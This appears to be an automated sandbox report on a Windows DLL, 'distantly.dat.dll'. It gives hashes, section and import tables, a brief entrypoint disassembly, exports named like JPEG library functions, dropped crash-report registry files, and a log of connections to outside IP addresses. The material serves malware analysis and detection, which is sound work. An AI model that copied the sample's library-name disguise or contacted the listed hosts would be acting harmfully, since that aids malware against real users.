                                                                                                                                                                    SHA-256:7CEA9BCC043FC1A939ADC73AC777C783C4D42A2A68C925EF31FFB32375020E63
                                                                                                                                                                    SHA-512:72194EDEA94206F1AB9D63A1AC613DED8EE91DFF9BFCA392EC1603DCBB77C2D312E79F84914638E93355BA65F9C5FE617D41720A82726E0387CF8F27EE029E44
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:regfR...R...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....B..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):24576
                                                                                                                                                                    Entropy (8bit):3.0508681916123495
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:iz+5K5gjaM1gnVVeeDzeT1NKZtj7veiNZpuA9fWeiNZpuJ:aQKOg/eeDzeJNYtjLtZpu+fWtZpu
                                                                                                                                                                    MD5:6AC38C528C6EA1ED1D5F56B2D6BA1C68
                                                                                                                                                                    SHA1:3F300ADF8050D7D7DC804088B4813A31912DE108
                                                                                                                                                                    SHA-256:A02E6FA2DCA1D55185234DB99014CDB5B65DA7D0932A05CCA250912AEEC596EA
                                                                                                                                                                    SHA-512:47BB6F8F858764A9B603F80DEB9CD8F928D5CB2ABB9871C478A4FFDF7E9C9C5FDFB91BE542203925BA274A9AF90C4770F5A36F3BA87CC564F1368A6F7B741A3A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:regfQ...Q...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....B..................................................................................................................................................................................................................................................................................................................................................HvLE.>......Q.... ......r...-v..M.y...........................hbin................p.\..,..........nk,..6..B................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..6..B....... ........................... .......Z.......................Root........lf......Root....nk ..6..B................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...
                                                                                                                                                                    File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):6.494907105232492
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:distantly.dat.dll
                                                                                                                                                                    File size:699233
                                                                                                                                                                    MD5:5f1e08625d65bb93e8bf4611d2ee9070
                                                                                                                                                                    SHA1:56fc9eb319ac902ac7e26357bd4cc598a3644d38
                                                                                                                                                                    SHA256:7bfa0fc80cf1b4dc110356aad858ed3638985dce794286dfe9a25ff3869fed02
                                                                                                                                                                    SHA512:94de1f8c3da8439f6bee529cf6e4d10979ca757af0b30f27b7d9f2d0dbbd18051c9b49e3c7470c2c271bbf1221986497e266168ff9a2d47d5b47924eac7fd011
                                                                                                                                                                    SSDEEP:12288:dDxy+2MIBYYimb3oG11xfTUOz3dluiIIN:Vg+2MIBYkb4G11hTsi
                                                                                                                                                                    TLSH:50E42A83A6826C82DBE61435CD6ED33667347A5C83F3DBB3B61499E27D635A33944308
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.WW.2..C......!.....L..........p........`.....j............>............................. ......................0..S..
                                                                                                                                                                    Icon Hash:7ae282899bbab082
                                                                                                                                                                    Entrypoint:0x6ad81470
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                    Imagebase:0x6ad80000
                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                    Time Stamp:0x5757085E [Tue Jun 7 17:46:06 2016 UTC]
                                                                                                                                                                    TLS Callbacks:0x6adc4bf0, 0x6adc4ba0
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:1cba0e23b706e0bfbc0a4cb9b6bd80fb
                                                                                                                                                                    Signature Valid:
                                                                                                                                                                    Signature Issuer:
                                                                                                                                                                    Signature Validation Error:
                                                                                                                                                                    Error Number:
                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                      Subject Chain
                                                                                                                                                                        Version:
                                                                                                                                                                        Thumbprint MD5:
                                                                                                                                                                        Thumbprint SHA-1:
                                                                                                                                                                        Thumbprint SHA-256:
                                                                                                                                                                        Serial:
                                                                                                                                                                        Instruction
                                                                                                                                                                        sub esp, 1Ch
                                                                                                                                                                        mov edx, dword ptr [esp+24h]
                                                                                                                                                                        mov dword ptr [6ADF2030h], 00000000h
                                                                                                                                                                        cmp edx, 01h
                                                                                                                                                                        je 00007F3204D5C25Ch
                                                                                                                                                                        mov ecx, dword ptr [esp+28h]
                                                                                                                                                                        mov eax, dword ptr [esp+20h]
                                                                                                                                                                        call 00007F3204D5C052h
                                                                                                                                                                        add esp, 1Ch
                                                                                                                                                                        retn 000Ch
                                                                                                                                                                        lea esi, dword ptr [esi+00000000h]
                                                                                                                                                                        mov dword ptr [esp+0Ch], edx
                                                                                                                                                                        call 00007F3204DA003Ch
                                                                                                                                                                        mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                        jmp 00007F3204D5C219h
                                                                                                                                                                        nop
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        push esi
                                                                                                                                                                        push ebx
                                                                                                                                                                        sub esp, 10h
                                                                                                                                                                        mov ebx, dword ptr [6ADF4124h]
                                                                                                                                                                        mov dword ptr [esp], 6ADC7000h
                                                                                                                                                                        call ebx
                                                                                                                                                                        mov esi, eax
                                                                                                                                                                        sub esp, 04h
                                                                                                                                                                        test esi, esi
                                                                                                                                                                        mov eax, 00000000h
                                                                                                                                                                        je 00007F3204D5C26Bh
                                                                                                                                                                        mov dword ptr [esp], 6ADC7000h
                                                                                                                                                                        call dword ptr [6ADF4144h]
                                                                                                                                                                        sub esp, 04h
                                                                                                                                                                        mov dword ptr [6ADF201Ch], eax
                                                                                                                                                                        mov dword ptr [esp+04h], 6ADC7013h
                                                                                                                                                                        mov dword ptr [esp], esi
                                                                                                                                                                        call dword ptr [6ADF4128h]
                                                                                                                                                                        sub esp, 08h
                                                                                                                                                                        test eax, eax
                                                                                                                                                                        je 00007F3204D5C253h
                                                                                                                                                                        mov dword ptr [esp+04h], 6ADF2004h
                                                                                                                                                                        mov dword ptr [esp], 6ADEC000h
                                                                                                                                                                        call eax
                                                                                                                                                                        mov eax, dword ptr [6ADC6020h]
                                                                                                                                                                        test eax, eax
                                                                                                                                                                        je 00007F3204D5C27Ah
                                                                                                                                                                        mov dword ptr [esp], 6ADC7029h
                                                                                                                                                                        call ebx
                                                                                                                                                                        mov edx, 00000000h
                                                                                                                                                                        sub esp, 04h
                                                                                                                                                                        test eax, eax
                                                                                                                                                                        je 00007F3204D5C258h
                                                                                                                                                                        mov dword ptr [esp+04h], 00DC7037h
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x730000xc53.edata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x740000x5a4.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x8df100x1cc8/55
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x770000x1790.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x760000x18.tls
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x741080xcc.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x44ad40x44c00False0.40852272727272726data6.536128817541659IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x460000x240x200False0.068359375data0.444378072732298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rdata0x470000x240c40x24200False0.042259137110726645data2.965728380228879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                        /40x6c0000x59540x5a00False0.266796875data4.8715558095609435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .bss0x720000x3e40x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .edata0x730000xc530xe00False0.41322544642857145data4.9102030514161354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .idata0x740000x5a40x600False0.42578125data4.85888040741761IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .CRT0x750000x2c0x200False0.0546875data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .tls0x760000x200x200False0.052734375data0.28655982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .reloc0x770000x17900x1800False0.8084309895833334data6.600381492361927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        /140x790000x380x200False0.068359375Matlab v4 mat-file (little endian) *, rows 2, columns 2621440.23653878450968063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        /290x7a0000xba40xc00False0.4329427083333333data5.509643399768958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        /410x7b0000x870x200False0.2265625data1.630440230936631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        /550x7c0000x1a49b0x1b000False0.9540925202546297data7.9065716986145675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        /670x970000x380x200False0.1171875data0.6947581054952565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        DLLImport
                                                                                                                                                                        KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, InterlockedCompareExchange, InterlockedExchange, LeaveCriticalSection, LoadLibraryA, QueryPerformanceCounter, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualProtect, VirtualQuery
                                                                                                                                                                        msvcrt.dll__dllonexit, _amsg_exit, _initterm, _iob, _lock, _onexit, _unlock, abort, calloc, exit, ferror, fflush, fprintf, fread, free, fwrite, getenv, malloc, memcpy, memset, sprintf, sscanf, strlen, strncmp, vfprintf
                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                        lcopy_block_row10x6adade90
                                                                                                                                                                        lcopy_sample_rows20x6adade30
                                                                                                                                                                        ldiv_round_up30x6adaddf0
                                                                                                                                                                        linit_1pass_quantizer40x6adabf70
                                                                                                                                                                        linit_2pass_quantizer50x6adadc70
                                                                                                                                                                        linit_c_coef_controller60x6ad82a40
                                                                                                                                                                        linit_c_main_controller70x6ad8c450
                                                                                                                                                                        linit_c_master_control80x6ad8f7f0
                                                                                                                                                                        linit_c_prep_controller90x6ad933c0
                                                                                                                                                                        linit_color_converter100x6ad83cf0
                                                                                                                                                                        linit_color_deconverter110x6ad9a0e0
                                                                                                                                                                        linit_compress_master120x6ad8c240
                                                                                                                                                                        linit_d_coef_controller130x6ad97f90
                                                                                                                                                                        linit_d_main_controller140x6ad9d790
                                                                                                                                                                        linit_d_post_controller150x6ada4f10
                                                                                                                                                                        linit_downsampler160x6ad93f00
                                                                                                                                                                        linit_forward_dct170x6ad84840
                                                                                                                                                                        linit_huff_decoder180x6ad9c280
                                                                                                                                                                        linit_huff_encoder190x6ad8c190
                                                                                                                                                                        linit_input_controller200x6ad9d100
                                                                                                                                                                        linit_inverse_dct210x6ad9a8b0
                                                                                                                                                                        linit_marker_reader220x6ad9fd60
                                                                                                                                                                        linit_marker_writer230x6ad8e8a0
                                                                                                                                                                        linit_master_decompress240x6ada0a60
                                                                                                                                                                        linit_memory_mgr250x6adaf3e0
                                                                                                                                                                        linit_merged_upsampler260x6ada3760
                                                                                                                                                                        linit_phuff_decoder270x6ada4af0
                                                                                                                                                                        linit_phuff_encoder280x6ad92de0
                                                                                                                                                                        linit_upsampler290x6ada55e0
                                                                                                                                                                        lpeg_CreateCompress300x6ad815b0
                                                                                                                                                                        lpeg_CreateDecompress310x6ad94f40
                                                                                                                                                                        lpeg_abort320x6ad8fb40
                                                                                                                                                                        lpeg_abort_compress330x6ad81730
                                                                                                                                                                        lpeg_abort_decompress340x6ad95150
                                                                                                                                                                        lpeg_add_quant_table350x6ad8fc20
                                                                                                                                                                        lpeg_alloc_huff_table360x6ad8fbf0
                                                                                                                                                                        lpeg_alloc_quant_table370x6ad8fbc0
                                                                                                                                                                        lpeg_calc_output_dimensions380x6ada0270
                                                                                                                                                                        lpeg_consume_input390x6ad95430
                                                                                                                                                                        lpeg_copy_critical_parameters400x6ad94c60
                                                                                                                                                                        lpeg_crop_scanline1050x6ad95bb0
                                                                                                                                                                        lpeg_default_colorspace410x6ad8fe60
                                                                                                                                                                        lpeg_destroy420x6ad8fb90
                                                                                                                                                                        lpeg_destroy_compress430x6ad81720
                                                                                                                                                                        lpeg_destroy_decompress440x6ad95140
                                                                                                                                                                        lpeg_fdct_float450x6ada5ce0
                                                                                                                                                                        lpeg_fdct_ifast460x6ada5ec0
                                                                                                                                                                        lpeg_fdct_islow470x6ada60e0
                                                                                                                                                                        lpeg_fill_bit_buffer480x6ad9b0a0
                                                                                                                                                                        lpeg_finish_compress490x6ad817f0
                                                                                                                                                                        lpeg_finish_decompress500x6ad95740
                                                                                                                                                                        lpeg_finish_output510x6ad963f0
                                                                                                                                                                        lpeg_free_large520x6adaf570
                                                                                                                                                                        lpeg_free_small530x6adaf550
                                                                                                                                                                        lpeg_gen_optimal_table540x6ad8bcf0
                                                                                                                                                                        lpeg_get_large550x6adaf560
                                                                                                                                                                        lpeg_get_small560x6adaf540
                                                                                                                                                                        lpeg_has_multiple_scans570x6ad95700
                                                                                                                                                                        lpeg_huff_decode580x6ad9b1e0
                                                                                                                                                                        lpeg_idct_1x1590x6adab430
                                                                                                                                                                        lpeg_idct_2x2600x6adab130
                                                                                                                                                                        lpeg_idct_4x4610x6adaace0
                                                                                                                                                                        lpeg_idct_float620x6ada6380
                                                                                                                                                                        lpeg_idct_ifast630x6ada6880
                                                                                                                                                                        lpeg_idct_islow640x6ada6ea0
                                                                                                                                                                        lpeg_input_complete650x6ad956c0
                                                                                                                                                                        lpeg_make_c_derived_tbl660x6ad8b7a0
                                                                                                                                                                        lpeg_make_d_derived_tbl670x6ad9ac10
                                                                                                                                                                        lpeg_mem_available680x6adaf580
                                                                                                                                                                        lpeg_mem_dest1020x6ad966f0
                                                                                                                                                                        lpeg_mem_init690x6adaf5b0
                                                                                                                                                                        lpeg_mem_src1030x6ad969e0
                                                                                                                                                                        lpeg_mem_term700x6adaf5c0
                                                                                                                                                                        lpeg_new_colormap710x6ada09f0
                                                                                                                                                                        lpeg_open_backing_store720x6adaf590
                                                                                                                                                                        lpeg_quality_scaling730x6ad8fda0
                                                                                                                                                                        lpeg_read_coefficients740x6ada58d0
                                                                                                                                                                        lpeg_read_header750x6ad95160
                                                                                                                                                                        lpeg_read_raw_data760x6ad962c0
                                                                                                                                                                        lpeg_read_scanlines770x6ad95d90
                                                                                                                                                                        lpeg_resync_to_restart780x6ad9fc20
                                                                                                                                                                        lpeg_save_markers790x6ad9fed0
                                                                                                                                                                        lpeg_set_colorspace800x6ad90910
                                                                                                                                                                        lpeg_set_defaults810x6ad902a0
                                                                                                                                                                        lpeg_set_linear_quality820x6ad8fd40
                                                                                                                                                                        lpeg_set_marker_processor830x6ad9ffb0
                                                                                                                                                                        lpeg_set_quality840x6ad8fdd0
                                                                                                                                                                        lpeg_simple_progression850x6ad90d50
                                                                                                                                                                        lpeg_skip_scanlines1040x6ad95e30
                                                                                                                                                                        lpeg_start_compress860x6ad81a50
                                                                                                                                                                        lpeg_start_decompress870x6ad95ad0
                                                                                                                                                                        lpeg_start_output880x6ad96380
                                                                                                                                                                        lpeg_std_error890x6ada5c70
                                                                                                                                                                        lpeg_stdio_dest900x6ad96680
                                                                                                                                                                        lpeg_stdio_src910x6ad96930
                                                                                                                                                                        lpeg_suppress_tables920x6ad81740
                                                                                                                                                                        lpeg_write_coefficients930x6ad94ae0
                                                                                                                                                                        lpeg_write_m_byte940x6ad819e0
                                                                                                                                                                        lpeg_write_m_header950x6ad81980
                                                                                                                                                                        lpeg_write_marker960x6ad818f0
                                                                                                                                                                        lpeg_write_raw_data970x6ad81bb0
                                                                                                                                                                        lpeg_write_scanlines980x6ad81ae0
                                                                                                                                                                        lpeg_write_tables990x6adadeb0
                                                                                                                                                                        lround_up1000x6adade10
                                                                                                                                                                        next1010x6ad819f0
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jun 2, 2023 13:13:20.213970900 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.214020014 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.214122057 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.218794107 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.218816996 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.464577913 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.464679956 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.628750086 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.628798008 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.629625082 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.629921913 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.631427050 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.676333904 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.747353077 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.747468948 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.747528076 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.747665882 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.747741938 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.756551027 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.756598949 CEST4434971374.6.143.25192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.756613016 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.756673098 CEST49713443192.168.2.474.6.143.25
                                                                                                                                                                        Jun 2, 2023 13:13:20.785283089 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:20.785342932 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.785470009 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:20.785903931 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:20.785939932 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.876622915 CEST4434971487.248.100.215192.168.2.4
